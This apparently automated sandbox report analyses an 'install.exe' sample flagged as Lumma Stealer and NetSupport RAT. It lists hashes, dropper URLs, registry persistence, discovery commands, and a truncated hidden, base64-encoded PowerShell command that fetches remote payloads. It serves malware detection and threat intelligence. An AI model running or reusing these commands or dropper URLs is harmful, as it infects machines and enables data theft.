lumma | f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-10-2024 02:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

install.exe
Size

136KB
MD5

5ecd826babbebdd959456c471dec6465
SHA1

f94a596b742c0653ff7201469f133108f17b46e9
SHA256

b2be43c010bc0d268a42a11296829e088d7eef81cc39bfcdc0b9f0e9a65717ea
SHA512

30563a15786f245e4a7ff1b8996f302dbf4b1d4950098d6899815b5065d3058b290a81b6564c19c85cfcd425c08c9f6bac5bc31ba95773978f9a9c5cde123d38
SSDEEP

1536:JZ2FWSNhd/4131iP08SKKAP7wBwp8wZtE:r2ddQ131ispKJP7w2p

Score

10^/10

lumma netsupport discovery execution persistence rat stealer

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://gailsacademy.com/fza/f1a.zip

exe.dropper

https://gailsacademy.com/fza/f4a.zip

exe.dropper

https://gailsacademy.com/fza/f3a.zip

exe.dropper

https://gailsacademy.com/fza/f2a.zip

exe.dropper

https://gailsacademy.com/fzf/

Extracted

Family

lumma

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1424	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
1376	vlc.exe
4528	vlc.exe
3880	client32.exe

Loads dropped DLL 10 IoCs

pid	Process
1376	vlc.exe
1376	vlc.exe
4528	vlc.exe
4528	vlc.exe
3880	client32.exe
3880	client32.exe
3880	client32.exe
3880	client32.exe
3880	client32.exe
3880	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TempControll = "C:\\Users\\Admin\\AppData\\Roaming\\TempControll\\client32.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
16	pastebin.com
17	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4528 set thread context of 3624	4528	vlc.exe	114

System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
1376	vlc.exe
1424	powershell.exe
4528	vlc.exe
1424	powershell.exe
4528	vlc.exe
3316	powershell.exe
3316	powershell.exe
3624	cmd.exe
3624	cmd.exe
3624	cmd.exe
3624	cmd.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4528	vlc.exe
3624	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	5100	WMIC.exe
Token: SeSecurityPrivilege	5100	WMIC.exe
Token: SeTakeOwnershipPrivilege	5100	WMIC.exe
Token: SeLoadDriverPrivilege	5100	WMIC.exe
Token: SeSystemProfilePrivilege	5100	WMIC.exe
Token: SeSystemtimePrivilege	5100	WMIC.exe
Token: SeProfSingleProcessPrivilege	5100	WMIC.exe
Token: SeIncBasePriorityPrivilege	5100	WMIC.exe
Token: SeCreatePagefilePrivilege	5100	WMIC.exe
Token: SeBackupPrivilege	5100	WMIC.exe
Token: SeRestorePrivilege	5100	WMIC.exe
Token: SeShutdownPrivilege	5100	WMIC.exe
Token: SeDebugPrivilege	5100	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5100	WMIC.exe
Token: SeRemoteShutdownPrivilege	5100	WMIC.exe
Token: SeUndockPrivilege	5100	WMIC.exe
Token: SeManageVolumePrivilege	5100	WMIC.exe
Token: 33	5100	WMIC.exe
Token: 34	5100	WMIC.exe
Token: 35	5100	WMIC.exe
Token: 36	5100	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5100	WMIC.exe
Token: SeSecurityPrivilege	5100	WMIC.exe
Token: SeTakeOwnershipPrivilege	5100	WMIC.exe
Token: SeLoadDriverPrivilege	5100	WMIC.exe
Token: SeSystemProfilePrivilege	5100	WMIC.exe
Token: SeSystemtimePrivilege	5100	WMIC.exe
Token: SeProfSingleProcessPrivilege	5100	WMIC.exe
Token: SeIncBasePriorityPrivilege	5100	WMIC.exe
Token: SeCreatePagefilePrivilege	5100	WMIC.exe
Token: SeBackupPrivilege	5100	WMIC.exe
Token: SeRestorePrivilege	5100	WMIC.exe
Token: SeShutdownPrivilege	5100	WMIC.exe
Token: SeDebugPrivilege	5100	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5100	WMIC.exe
Token: SeRemoteShutdownPrivilege	5100	WMIC.exe
Token: SeUndockPrivilege	5100	WMIC.exe
Token: SeManageVolumePrivilege	5100	WMIC.exe
Token: 33	5100	WMIC.exe
Token: 34	5100	WMIC.exe
Token: 35	5100	WMIC.exe
Token: 36	5100	WMIC.exe
Token: SeIncreaseQuotaPrivilege	816	WMIC.exe
Token: SeSecurityPrivilege	816	WMIC.exe
Token: SeTakeOwnershipPrivilege	816	WMIC.exe
Token: SeLoadDriverPrivilege	816	WMIC.exe
Token: SeSystemProfilePrivilege	816	WMIC.exe
Token: SeSystemtimePrivilege	816	WMIC.exe
Token: SeProfSingleProcessPrivilege	816	WMIC.exe
Token: SeIncBasePriorityPrivilege	816	WMIC.exe
Token: SeCreatePagefilePrivilege	816	WMIC.exe
Token: SeBackupPrivilege	816	WMIC.exe
Token: SeRestorePrivilege	816	WMIC.exe
Token: SeShutdownPrivilege	816	WMIC.exe
Token: SeDebugPrivilege	816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	816	WMIC.exe
Token: SeRemoteShutdownPrivilege	816	WMIC.exe
Token: SeUndockPrivilege	816	WMIC.exe
Token: SeManageVolumePrivilege	816	WMIC.exe
Token: 33	816	WMIC.exe
Token: 34	816	WMIC.exe
Token: 35	816	WMIC.exe
Token: 36	816	WMIC.exe
Token: SeIncreaseQuotaPrivilege	816	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1652	AcroRd32.exe
3880	client32.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2052	javaw.exe
2052	javaw.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe
1652	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1292 wrote to memory of 2052	1292	install.exe	80
PID 1292 wrote to memory of 2052	1292	install.exe	80
PID 1292 wrote to memory of 2052	1292	install.exe	80
PID 2052 wrote to memory of 3976	2052	javaw.exe	82
PID 2052 wrote to memory of 3976	2052	javaw.exe	82
PID 2052 wrote to memory of 3976	2052	javaw.exe	82
PID 3976 wrote to memory of 3756	3976	cmd.exe	84
PID 3976 wrote to memory of 3756	3976	cmd.exe	84
PID 3976 wrote to memory of 3756	3976	cmd.exe	84
PID 3976 wrote to memory of 640	3976	cmd.exe	85
PID 3976 wrote to memory of 640	3976	cmd.exe	85
PID 2052 wrote to memory of 2728	2052	javaw.exe	86
PID 2052 wrote to memory of 2728	2052	javaw.exe	86
PID 2052 wrote to memory of 2728	2052	javaw.exe	86
PID 2728 wrote to memory of 1172	2728	cmd.exe	88
PID 2728 wrote to memory of 1172	2728	cmd.exe	88
PID 2728 wrote to memory of 1172	2728	cmd.exe	88
PID 2728 wrote to memory of 5100	2728	cmd.exe	89
PID 2728 wrote to memory of 5100	2728	cmd.exe	89
PID 2728 wrote to memory of 5100	2728	cmd.exe	89
PID 2728 wrote to memory of 4596	2728	cmd.exe	90
PID 2728 wrote to memory of 4596	2728	cmd.exe	90
PID 2728 wrote to memory of 4596	2728	cmd.exe	90
PID 2052 wrote to memory of 1960	2052	javaw.exe	92
PID 2052 wrote to memory of 1960	2052	javaw.exe	92
PID 2052 wrote to memory of 1960	2052	javaw.exe	92
PID 1960 wrote to memory of 348	1960	cmd.exe	94
PID 1960 wrote to memory of 348	1960	cmd.exe	94
PID 1960 wrote to memory of 348	1960	cmd.exe	94
PID 1960 wrote to memory of 816	1960	cmd.exe	95
PID 1960 wrote to memory of 816	1960	cmd.exe	95
PID 1960 wrote to memory of 816	1960	cmd.exe	95
PID 1960 wrote to memory of 1268	1960	cmd.exe	96
PID 1960 wrote to memory of 1268	1960	cmd.exe	96
PID 1960 wrote to memory of 1268	1960	cmd.exe	96
PID 2052 wrote to memory of 2628	2052	javaw.exe	97
PID 2052 wrote to memory of 2628	2052	javaw.exe	97
PID 2052 wrote to memory of 2628	2052	javaw.exe	97
PID 2628 wrote to memory of 2468	2628	cmd.exe	99
PID 2628 wrote to memory of 2468	2628	cmd.exe	99
PID 2628 wrote to memory of 2468	2628	cmd.exe	99
PID 2628 wrote to memory of 3264	2628	cmd.exe	100
PID 2628 wrote to memory of 3264	2628	cmd.exe	100
PID 2628 wrote to memory of 3264	2628	cmd.exe	100
PID 2628 wrote to memory of 1048	2628	cmd.exe	101
PID 2628 wrote to memory of 1048	2628	cmd.exe	101
PID 2628 wrote to memory of 1048	2628	cmd.exe	101
PID 2052 wrote to memory of 1444	2052	javaw.exe	102
PID 2052 wrote to memory of 1444	2052	javaw.exe	102
PID 2052 wrote to memory of 1444	2052	javaw.exe	102
PID 1444 wrote to memory of 1428	1444	cmd.exe	104
PID 1444 wrote to memory of 1428	1444	cmd.exe	104
PID 1444 wrote to memory of 1428	1444	cmd.exe	104
PID 1444 wrote to memory of 4984	1444	cmd.exe	105
PID 1444 wrote to memory of 4984	1444	cmd.exe	105
PID 2052 wrote to memory of 1424	2052	javaw.exe	106
PID 2052 wrote to memory of 1424	2052	javaw.exe	106
PID 2052 wrote to memory of 1424	2052	javaw.exe	106
PID 2052 wrote to memory of 5060	2052	javaw.exe	108
PID 2052 wrote to memory of 5060	2052	javaw.exe	108
PID 2052 wrote to memory of 5060	2052	javaw.exe	108
PID 5060 wrote to memory of 1376	5060	cmd.exe	110
PID 5060 wrote to memory of 1376	5060	cmd.exe	110
PID 2052 wrote to memory of 4436	2052	javaw.exe	111

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
  "C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3976
  - - C:\Windows\SysWOW64\chcp.com
      C:\Windows\System32\chcp.com 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:3756
  - - C:\Windows\system32\reg.exe
      C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
      4⤵
      PID:640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Windows\SysWOW64\chcp.com
      C:\Windows\System32\chcp.com 866
      4⤵
      System Location Discovery: System Language Discovery
      PID:1172
  - - C:\Windows\SysWOW64\wbem\WMIC.exe
      C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:5100
  - - C:\Windows\SysWOW64\more.com
      C:\Windows\System32\more.com
      4⤵
      System Location Discovery: System Language Discovery
      PID:4596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Windows\SysWOW64\chcp.com
      C:\Windows\System32\chcp.com 866
      4⤵
      System Location Discovery: System Language Discovery
      PID:348
  - - C:\Windows\SysWOW64\wbem\WMIC.exe
      C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:816
  - - C:\Windows\SysWOW64\more.com
      C:\Windows\System32\more.com
      4⤵
      System Location Discovery: System Language Discovery
      PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\SysWOW64\chcp.com
      C:\Windows\System32\chcp.com 866
      4⤵
      System Location Discovery: System Language Discovery
      PID:2468
  - - C:\Windows\SysWOW64\wbem\WMIC.exe
      C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
      4⤵
      System Location Discovery: System Language Discovery
      PID:3264
  - - C:\Windows\SysWOW64\more.com
      C:\Windows\System32\more.com
      4⤵
      System Location Discovery: System Language Discovery
      PID:1048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1444
  - - C:\Windows\SysWOW64\chcp.com
      C:\Windows\System32\chcp.com 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:1428
  - - C:\Windows\system32\reg.exe
      C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
      4⤵
      PID:4984
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93RXJTSGVMTCAtbm9wUm8gLUV4ZWNVVElvTnBPIEJZcGFTUyAtdyBISWQgLWVjIEpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQVBRQW5BR2dBZEFCMEFIQUFjd0E2QUM4QUx3Qm5BR0VBYVFCc0FITUFZUUJqQUdFQVpBQmxBRzBBZVFBdUFHTUFid0J0QUM4QVpnQjZBR0VBTHdCbUFERUFZUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBOUFFY0FZd0JOQUNBQVpRQjRBSEFBUVFCT0FHUUFMUUJCQUhJQVF3QklBRWtBVmdCbEFDQUFMUUJGQUhJQWNnQlBBSElBUVFCakFGUUFhUUJQQUc0QUlBQnpBRWtBVEFCbEFFNEFWQUJzQUZrQVF3QlBBRzRBVkFCSkFFNEFWUUJsQURzQUlBQWtBSFVBYXdCWUFGZ0FVZ0JHQUVrQVpRQTlBQ2NBYlFBekFESUFWd0JXQURVQVlnQlNBQzRBZWdCcEFIQUFKd0E3QUNBQUpBQlNBSElBVGdCb0FFZ0FTUUJsQUQwQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QVp3QmhBR2tBYkFCekFHRUFZd0JoQUdRQVpRQnRBSGtBTGdCakFHOEFiUUF2QUdZQWVnQmhBQzhBWmdBMEFHRUFMZ0I2QUdrQWNBQW5BRHNBSUFBa0FITUFWUUJDQUhBQVlnQm1BRGdBUFFBbkFFd0FUd0F4QUdrQWJnQk9BRUVBTGdCNkFHa0FjQUFuQURzQUlBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQVBRQkhBR01BVFFBZ0FGTUFWQUJoQUhJQVZBQXRBR0lBYVFCVUFITUFkQUJTQUdFQWJnQnpBR1lBWlFCeUFDQUFMUUJsQUhJQWNnQlBBRklBWVFCakFGUUFTUUJ2QUU0QUlBQlRBR2tBYkFCbEFFNEFWQUJNQUhrQVl3QnZBRTRBVkFCSkFHNEFkUUJGQURzQUlBQWtBR0lBYkFCaUFHVUFjQUI2QUZvQVBRQW5BRFlBUkFCTkFFd0FWUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFVZ0JuQUhvQU5RQlhBRXdBYmdBOUFDY0FhQUIwQUhRQWNBQnpBRG9BTHdBdkFHY0FZUUJwQUd3QWN3QmhBR01BWVFCa0FHVUFiUUI1QUM0QVl3QnZBRzBBTHdCbUFIb0FZUUF2QUdZQU13QmhBQzRBZWdCcEFIQUFKd0E3QUNBQVd3QnVBR1VBZEFBdUFITUFSUUJ5QUhZQWFRQkRBRVVBVUFCUEFFa0FUZ0IwQUcwQVFRQk9BRUVBUndCRkFGSUFYUUE2QURvQWN3QmxBRU1BZFFCU0FFa0FWQUJaQUhBQVVnQlBBRlFBYndCakFFOEFiQUFnQUQwQUlBQmJBRTRBWlFCMEFDNEFjd0JGQUdNQVZRQlNBRWtBVkFCWkFGQUFVZ0JQQUhRQVR3QmpBRThBVEFCMEFGa0FjQUJsQUYwQU9nQTZBRlFBVEFCVEFERUFNZ0E3QUNBQUpBQkpBRzRBUXdCSEFESUFNZ0JXQUVvQVBRQW5BRlFBWlFCdEFIQUFRd0J2QUc0QWRBQnlBRzhBYkFCc0FDY0FPd0FnQUNRQU5BQjVBRVlBWXdCS0FGWUFTZ0E5QUNjQWJBQTRBR1VBUmdCV0FFOEFVd0JUQUM0QWVnQnBBSEFBSndBN0FDQUFZd0JFQUNBQUpBQkZBRzRBZGdBNkFFRUFjQUJ3QUdRQVlRQjBBR0VBT3dBZ0FDUUFSQUF6QUdjQWJBQndBRDBBSndCb0FIUUFkQUJ3QUhNQU9nQXZBQzhBWndCaEFHa0FiQUJ6QUdFQVl3QmhBR1FBWlFCdEFIa0FMZ0JqQUc4QWJRQXZBR1lBZWdCaEFDOEFaZ0F5QUdFQUxnQjZBR2tBY0FBbkFEc0FJQUFrQUVZQVl3QnRBRllBVndCekFGa0FQUUFpQUNRQVpRQk9BSFlBT2dCaEFGQUFVQUJrQUVFQWRBQkJBRndBSkFCaUFHd0FZZ0JsQUhBQWVnQmFBQ0lBT3dBZ0FDUUFlQUJJQUdZQU5RQjRBRzhBVFFCMUFEMEFJZ0FrQUdVQVRnQjJBRG9BUVFCd0FIQUFSQUJoQUhRQVFRQmNBQ1FBY3dCVkFFSUFjQUJpQUdZQU9BQWlBRHNBSUFBa0FFNEFjd0JLQUhnQWRRQlpBRGdBVkFBOUFDSUFld0F3QUgwQVhBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQmxBRzRBVmdBNkFFRUFVQUJ3QUVRQVFRQjBBRUVBTEFBZ0FDUUFkUUJyQUZnQVdBQlNBRVlBU1FCbEFEc0FJQUFrQUdRQU1BQkVBRGNBV1FCd0FEMEFTZ0J2QUVrQVRnQXRBRkFBUVFCVUFHZ0FJQUF0QUhBQVFRQjBBRWdBSUFBa0FHVUFiZ0JXQURvQVFRQlFBSEFBUkFCQkFIUUFRUUFnQUMwQVl3QklBR2tBVEFCa0FGQUFRUUIwQUdnQUlBQWtBRFFBZVFCR0FHTUFTZ0JXQUVvQU93QWdBQ1FBU3dCT0FEWUFUUUJNQUhJQWJBQnFBRDBBSWdCaUFHa0FkQUJ6QUdFQVpBQk5BRWtBVGdBdUFHVUFXQUJsQUNBQUx3QlVBRklBUVFCT0FGTUFaZ0JsQUZJQUlBQjBBR0lBWlFCT0FHc0FJQUF2QUVRQVR3QlhBRzRBVEFCUEFFRUFSQUFnQUM4QVVBQnlBR2tBYndCU0FFa0FWQUJaQUNBQWJnQnZBSElBYlFCQkFFd0FJQUI3QURBQWZRQWdBSHNBTVFCOUFDSUFJQUF0QUdZQUlBQWtBRklBWndCNkFEVUFWd0JNQUc0QUxBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFBa0FIUUFRUUExQURBQVJRQTlBQ2NBUWdCSkFGUUFVd0JCQUdRQWJRQkpBRTRBTGdCRkFIZ0FSUUFnQUM4QVZBQlNBR0VBVGdCVEFHWUFSUUJ5QUNBQU1BQjJBR0VBYUFCc0FDQUFMd0JFQUU4QWR3QnVBRXdBVHdCQkFHUUFJQUF2QUhBQWNnQnBBRThBVWdCcEFGUUFlUUFnQUU0QVR3QnlBRTBBWVFCc0FDQUFKd0FyQUNRQVJBQXpBR2NBYkFCd0FDc0FKd0FnQUNjQUt3QWtBRVlBWXdCdEFGWUFWd0J6QUZrQU93QWdBQ1FBTWdCeEFHWUFhQUJKQUc4QVpRQTlBQ0lBSkFCRkFHNEFkZ0E2QUdFQWNBQndBRVFBUVFCVUFFRUFYQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FpQURzQUlBQWtBR1FBZFFCdUFGUUFOd0JCQUZVQVBRQWlBR0lBYVFCMEFGTUFZUUJrQUcwQVNRQnVBQzRBWlFCWUFHVUFJQUF2QUhRQVVnQkJBRTRBVXdCbUFHVUFVZ0FnQUZjQVJBQmFBSE1BVHdCbkFDQUFMd0JrQUc4QWR3Qk9BRXdBYndCQkFFUUFJQUF2QUhBQVVnQnBBRzhBY2dCcEFGUUFlUUFnQUU0QWJ3QlNBRTBBUVFCc0FDQUFld0F3QUgwQUlBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQUxBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBQ1FBVndCTkFHVUFiQUJvQUZvQVN3QTlBQ0lBWWdCcEFIUUFVd0JoQUdRQWJRQkpBRzRBTGdCbEFGZ0FaUUFnQUM4QWRBQlNBRUVBVGdCVEFHWUFaUUJTQUNBQVZ3QkVBRm9BY3dCUEFHY0FJQUF2QUdRQWJ3QjNBRTRBVEFCdkFFRUFSQUFnQUM4QWNBQlNBR2tBYndCeUFHa0FWQUI1QUNBQVRnQnZBRklBVFFCQkFHd0FJQUFrQUZJQWNnQk9BR2dBU0FCSkFHVUFJQUFrQUU0QWN3QktBSGdBZFFCWkFEZ0FWQUFpQURzQUlBQkpBRVlBSUFBb0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBcEFDQUFld0FnQUdrQVJnQWdBQ2dBSkFCdUFFVUFOQUJCQUU0QVRBQm1BQ2tBSUFCN0FDQUFjd0IwQUVFQVVnQlVBQzBBWWdCcEFGUUFVd0IwQUhJQVFRQk9BRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBRklBUXdCRkFDQUFKQUJFQURNQVp3QnNBSEFBSUFBdEFFUUFaUUJUQUZRQWFRQk9BRUVBVkFCcEFFOEFUZ0FnQUNRQVJnQmpBRzBBVmdCWEFITUFXUUE3QUNBQWN3QjBBRUVBY2dCVUFDMEFZZ0JwQUZRQWN3QjBBRklBUVFCT0FGTUFSZ0JGQUhJQUlBQXRBSE1BVHdCVkFISUFRd0JsQUNBQUpBQlNBR2NBZWdBMUFGY0FUQUJ1QUNBQUxRQmtBRVVBY3dCVUFFa0FUZ0JCQUZRQWFRQlBBRzRBSUFBa0FIZ0FTQUJtQURVQWVBQnZBRTBBZFFBN0FDQUFVd0JVQUVFQVVnQjBBQzBBUWdCSkFIUUFjd0IwQUhJQVlRQnVBRk1BUmdCRkFIS